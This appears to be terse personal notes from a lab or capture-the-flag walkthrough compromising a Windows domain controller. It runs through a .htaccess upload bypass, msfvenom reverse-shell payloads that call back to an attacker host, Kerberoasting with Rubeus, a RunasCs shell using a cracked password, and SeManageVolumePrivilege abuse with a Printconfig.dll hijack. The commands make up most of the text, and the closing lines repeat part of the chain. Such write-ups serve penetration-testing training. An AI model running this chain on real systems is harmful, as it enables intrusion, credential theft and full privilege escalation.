Seems to be a domain controller with the ports open
Website present
There is an upload on the website:
We also have an upload directory:
Now we can modify the .htaccess
To create new .htaccess file:
echo "AddType application/x-httpd-php .evil" > .htaccessNow uploading it.
We can access it at http://192.168.218.187/uploads/shell.evil:
Then generating a msfvenom payload:
msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=192.168.45.186 LPORT=4444 > reverse.exeNow we can execute it after transfering to get a shell:
Might be possible but the process is most likely running as svc_apache.
Nope
Now using kerberoasting we got the hash:
.\Rubeus.exe kerberoast /nowrap /tgtdeleg
Now cracking it:
Now to get a shell as svc_mssql:
import-module .\Invoke-RunasCs.ps1
Invoke-RunasCs svc_mssql trustno1 cmd.exe -remote 192.168.45.167:1234
We have SeManageVolumePrivilege:
Now we can use an exploit: https://github.com/CsEnox/SeManageVolumeExploit/releases Run it first
SeManageVolumeExploit.exe
For Printconfig.dll:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dllThen transfer to machine Then copy it:
copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\
Then in powershell:
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)Now should have got a shell
Run it first
SeManageVolumeExploit.exe
For Printconfig.dll:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dllThen transfer to machine Then copy it:
copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\